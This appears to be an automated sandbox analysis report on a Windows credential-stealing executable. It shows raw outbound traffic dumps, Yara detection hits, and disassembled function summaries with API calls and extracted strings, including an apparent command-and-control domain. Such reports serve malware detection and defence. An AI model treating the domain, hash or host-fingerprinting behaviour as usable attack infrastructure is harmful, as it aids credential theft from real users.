2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: b6 90 a8 37 b4 72 8f c0 fe 67 35 63 7a fc 6a 99 cb 64 32 29 96 6c 2a 92 ee df d0 2b 9f 64 00 c8 26 18 79 c5 29 ce 15 e5 e9 c0 f3 b9 1d 92 a2 87 d4 d1 33 8e fd 05 94 ee 5a de eb 43 46 74 72 20 47 62 f3 f9 de 6e 15 63 55 42 4a 63 a6 b2 33 92 b8 e7 41 94 f0 66 d8 0b 62 77 2d 7f 62 f4 71 07 52 87 34 84 2d 79 e9 71 00 e1 85 5f c2 14 e4 62 60 70 95 8a 90 5c 6d fc f1 e6 26 ff 11 88 ae 3e ce 6c 0d d3 eb aa 38 ce ab 45 01 e1 ad 6b cc 11 30 86 eb 16 04 1d 2b 8f ea 7e 30 46 9b fb 25 84 f1 35 cb b2 b4 82 dd 77 83 40 dd f9 f1 24 0e b4 9d 77 37 6d d0 3d d5 d9 18 dc b9 92 8f e5 30 55 ea 14 75 48 25 43 f7 63 05 d2 51 e8 ec d6 ff f2 c4 9f 68 78 84 fc ff 20 b3 b3 a0 df 1c a5 44 02 46 6c e6 a5 69 21 18 07 2d ec 73 a9 de 97 86 d1 f5 cb 3f c4 ee 20 df 4b 22 83 58 ad 6d c2 e4 Data Ascii: 7rg5czjd2)l*+d&y)3ZCFtr GbncUBJc3Afbw-bqR4-yq_b`p\m&>l8Ek0+~0F%5w@$w7m=0UuH%CcQhx DFli!-s? K"Xm
2024-12-09 23:42:16 UTC	15331	OUT	Data Raw: c2 49 f0 98 5d e4 2a 77 13 49 a1 90 99 64 98 22 c8 0b cf 4f c9 77 cb 68 d4 24 82 7c 51 fc ef 2b e2 a7 55 d0 e0 83 d1 13 5f ca de 88 ad 82 dc 11 21 2b 31 f2 6a 80 63 ad ba 52 bb c9 19 36 db 0d a4 e7 5e ad 77 d7 91 eb 6a b3 d5 79 76 c0 b6 9b 40 cd 42 50 e4 e8 67 19 18 8d 2a 99 2e b0 48 ec ef 48 20 65 6d 95 65 4c 65 55 00 6f d5 2b 59 1b 8c fe 3b 78 61 e9 a3 24 a9 0d 41 71 51 40 b0 bc 65 61 6a 4c b0 11 17 b9 32 a4 fb 29 fa 65 83 fb e9 62 6f 28 db dd 47 4b c1 07 a6 7b 12 66 e4 8b 05 a1 7b 43 a4 30 07 cf 3f 6d ad 30 89 87 88 33 5e 0d 84 d1 a5 57 95 d1 7b 08 c6 4d ad e5 48 45 28 ae c9 c1 0d 56 bb eb 62 b8 84 5d 1a 5b 1b 8a 30 ad 0f b0 8e 10 5e 5c 50 89 89 ec 52 c9 0b ab e7 88 96 64 59 9a 63 01 2d 64 b6 c2 4e c2 a2 af fb c8 8f 3e 1b 90 57 48 b9 48 78 7f c8 d3 d2 Data Ascii: I]wId"Owh$\|Q+U_!+1jcR6^wjyv@BPg.HH emeLeUo+Y;xa$AqQ@eajL2)ebo(GK{f{C0?m03^W{MHE(Vb][0^\PRdYc-dN>WHHx
2024-12-09 23:42:19 UTC	1025	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bgdmqsothaefopugte5ruudc1o; expires=Fri, 04-Apr-2025 17:28:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VADcwGR2lElviAx44Xkcxd%2FjP384F344Gpw95aJvRUJuJdsrbXdPmMsvFXFI12Hp%2Fx8MyScqNoPRhKIZdKS7ft9HPu2YyjdSM%2F6b9I%2Fd9uO6Bivoye8RHdeAfv8cDdZex5Fimsk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8d9c958550cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1598&rtt_var=621&sent=309&recv=593&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572771&delivery_rate=1732937&cwnd=225&unsent_bytes=0&cid=dc45c4d0d17464d5&ts=3626&x=0"

Target ID:	0
Start time:	18:41:58
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd60000
File size:	1'858'048 bytes
MD5 hash:	52868AF74EE73E05662D437482D99489
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2081424148.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2159575392.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2081779151.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2080931138.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106519599.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2132681260.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2159595354.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2132681260.0000000001961000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156812212.000000000195D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59.5%
Total number of Nodes:	222
Total number of Limit Nodes:	21

Executed Functions

Function 00D815F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 00D81AF2
a, xrefs: 00D81AED
/, xrefs: 00D81A7B
,, xrefs: 00D81BCF
`, xrefs: 00D81699
a, xrefs: 00D81694
b, xrefs: 00D8168F
c, xrefs: 00D81AE3
y, xrefs: 00D81C69
!@, xrefs: 00D81623
a, xrefs: 00D81D5B
/, xrefs: 00D81A80
=, xrefs: 00D818E5
`, xrefs: 00D81D60
,, xrefs: 00D81A71
c, xrefs: 00D8168A
c, xrefs: 00D81D51
$, xrefs: 00D81A76
b, xrefs: 00D81D56
b, xrefs: 00D81AE8
x, xrefs: 00D81C64
?, xrefs: 00D818EF

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
API String ID: 0-2322859148
Opcode ID: 2f346a25f5ea1eec1b5613a52d84a18ac164568584a83d51a2d676ee1d8d820b
Instruction ID: ace66577aba97a1649839e1a158da76bf0c4acfce6f0ad5e1afac89a1ea3c844
Opcode Fuzzy Hash: 2f346a25f5ea1eec1b5613a52d84a18ac164568584a83d51a2d676ee1d8d820b
Instruction Fuzzy Hash: FC32157560C3808FD3249F28C49136EFBE5ABC5314F19492DE5D587382D6B9C84A8B63

Function 00D96F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(D080DE8F), ref: 00D971DB
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00D97218
SysFreeString.OLEAUT32(?), ref: 00D97504
SysFreeString.OLEAUT32(?), ref: 00D9750A
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00D97552

Strings

"#$%, xrefs: 00D975FC
{|, xrefs: 00D973BF
>C, xrefs: 00D970D7
C, xrefs: 00D970CF
.;, xrefs: 00D97282
.'(), xrefs: 00D97008, 00D970C1
!", xrefs: 00D971A9
{.] , xrefs: 00D971A1
p*v,, xrefs: 00D97199

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
API String ID: 1773362589-264043890
Opcode ID: 54cc9bdee4575ff38664b8a70570381be8eba37fbe71a6f72994c97ef1aa2f97
Instruction ID: 95c985af5a0fec57432dbe32f558e7735ae82920e70285b6d8449001b6f4774f
Opcode Fuzzy Hash: 54cc9bdee4575ff38664b8a70570381be8eba37fbe71a6f72994c97ef1aa2f97
Instruction Fuzzy Hash: E902FE71A1C3009FD710CF64C881B6BBBE5EBC5304F18892CF6959B2A1E779D845CBA2

Function 00D6E2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00D6E674

Strings

I~, xrefs: 00D6E8E3
"# `, xrefs: 00D6E70A
atten-supporse.biz, xrefs: 00D6E649, 00D6E9DD
qx, xrefs: 00D6E8EE
,, xrefs: 00D6E688
s, xrefs: 00D6E736
`~, xrefs: 00D6E8CD

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: Uninitialize
String ID: "# `$,$I~$`~$atten-supporse.biz$qx$s
API String ID: 3861434553-3378010734
Opcode ID: ef0584f8744468930b30d545826ad9f3cdb28a62b322e332e87a15617794d229
Instruction ID: f83927aa722505196252fddcd12e3764bd3e8ad2abec9942e5dd2e7a646841ed
Opcode Fuzzy Hash: ef0584f8744468930b30d545826ad9f3cdb28a62b322e332e87a15617794d229
Instruction Fuzzy Hash: A502BBB410C3D18BD735CF2584A07EBBFE1AFA2304F189DACD4DA5B256D675440A8BA2

Function 00D6A960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#xDz, xrefs: 00D6AACE
A|}~, xrefs: 00D6AAD6
N[\D, xrefs: 00D6AC00
N[\D, xrefs: 00D6ADB7, 00D6ADC0, 00D6ADEE, 00D6ACD2, 00D6ABC5, 00D6ACF6, 00D6ABA4, 00D6AD01
kl, xrefs: 00D6AB2D
'D F, xrefs: 00D6AAC6
n, xrefs: 00D6A982

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
API String ID: 0-490458541
Opcode ID: 466dc9f6ef656dc7ac3374a5df57753e4a980079dbc30ee3c1645bee3497a573
Instruction ID: f7efa1f7f29a59b9dec0627c58f841190aedc9496fea1bf82f76dc8aec5bbea4
Opcode Fuzzy Hash: 466dc9f6ef656dc7ac3374a5df57753e4a980079dbc30ee3c1645bee3497a573
Instruction Fuzzy Hash: F1C1187260C3505BC714CF6888905ABFBD3ABD2304F1E892CE9D56B742D676D909CB53

Function 00D6CE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N~ :, xrefs: 00D6CF45
atten-supporse.biz, xrefs: 00D6D27A
z@(, xrefs: 00D6CF5B
D276C559E4FF6A7223D904AF30EFEBBC, xrefs: 00D6CEAF
F^, xrefs: 00D6D0B9
VgfW, xrefs: 00D6CF2F
I@, xrefs: 00D6D0C4

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: D276C559E4FF6A7223D904AF30EFEBBC$F^$I@$N~ :$VgfW$atten-supporse.biz$z@(
API String ID: 0-977678812
Opcode ID: e0f449d7f8375a348014c82dfefae8eb39598a0ecd874d231589b1b953a801fb
Instruction ID: 1202f7f5637e043a8b355e38349b15b1776c3c147ec048a0c20f94861d941d4f
Opcode Fuzzy Hash: e0f449d7f8375a348014c82dfefae8eb39598a0ecd874d231589b1b953a801fb
Instruction Fuzzy Hash: 6691D0B064D3C18BD335CF25D4A1BEBBBE1AB96314F18896CD4D98B242D738454ACB62

Function 00D833A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#R,T, xrefs: 00D83647
VW, xrefs: 00D833E5
]~"p, xrefs: 00D8367F
KM, xrefs: 00D837FB
$^<P, xrefs: 00D8363F
ij, xrefs: 00D8397D

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: #R,T$$^<P$VW$]~"p$ij$KM
API String ID: 0-788320361
Opcode ID: fd4c4f4ebef97960e167317d603dc4b353d14f33b03a0e4d80d7cd5a3ce4cf61
Instruction ID: 522003907673ce50e9239d8d700dfdd6fc904ffd0d995c7a84bfaaee635909f5
Opcode Fuzzy Hash: fd4c4f4ebef97960e167317d603dc4b353d14f33b03a0e4d80d7cd5a3ce4cf61
Instruction Fuzzy Hash: FAF1CBB16083408FD314EF69D88262BBBE1EFD5704F54892CE5958B351E7B8DA06CB63

Function 00D8BFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00D8C0D7
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00D8C113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00D8C1D8

Strings

x, xrefs: 00D8C2F2

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: x
API String ID: 2243422189-2363233923
Opcode ID: 1a9609fa1cca0c04624b13af8c8390c542851457a4b06aed385b3c54a2645a18
Instruction ID: d3ea090d98fd538778dd1aa4cb0f81ade0f09e38f682b0bec95235095bc88428
Opcode Fuzzy Hash: 1a9609fa1cca0c04624b13af8c8390c542851457a4b06aed385b3c54a2645a18
Instruction Fuzzy Hash: F2D1B16061C3D08EDB359B2984503BBBBD1AFE7344F5C59ADD0C99B282D639850ACB73

Function 00D96C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c, xrefs: 00D96ECC
cba`cba`, xrefs: 00D96DDF
b, xrefs: 00D96ED0
`, xrefs: 00D96ED8
a, xrefs: 00D96ED4

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: `$a$b$c$cba`cba`
API String ID: 0-3925122358
Opcode ID: d8ac76ab91b55c0add53d095c797a76abedf693b5974408f65af894532a29224
Instruction ID: 9b32c3ba141ade70342751f1005a2413c450e7b73f32ec899458c030f4b76ed0
Opcode Fuzzy Hash: d8ac76ab91b55c0add53d095c797a76abedf693b5974408f65af894532a29224
Instruction Fuzzy Hash: 15A11371A083448FDF04CFA8C5513AEBBF2AF96300F1D846DE48697392D679C9048BB1

Function 00D6C36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

GS, xrefs: 00D6C677
4cde, xrefs: 00D6C79C
F'k), xrefs: 00D6C706
CJ, xrefs: 00D6C67E
){+}, xrefs: 00D6C788

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID: ){+}$4cde$CJ$F'k)$GS
API String ID: 0-4192230409
Opcode ID: ebb959d0f9cab50d423042da4f13b6d84e6ab0dbdf4cd75ff2f59fdf757afaea
Instruction ID: 910bd75c8c76a733dcd44dfa993b23b68702da63ac9db2a026216fe911bef374
Opcode Fuzzy Hash: ebb959d0f9cab50d423042da4f13b6d84e6ab0dbdf4cd75ff2f59fdf757afaea
Instruction Fuzzy Hash: 74B12AB84053458FE354DF628688FAA7BB0FB25310F1A82E8E0892F732D7748405CF96

Function 00D8C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

iJ, xrefs: 00D8CAF5
', xrefs: 00D8CC09

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
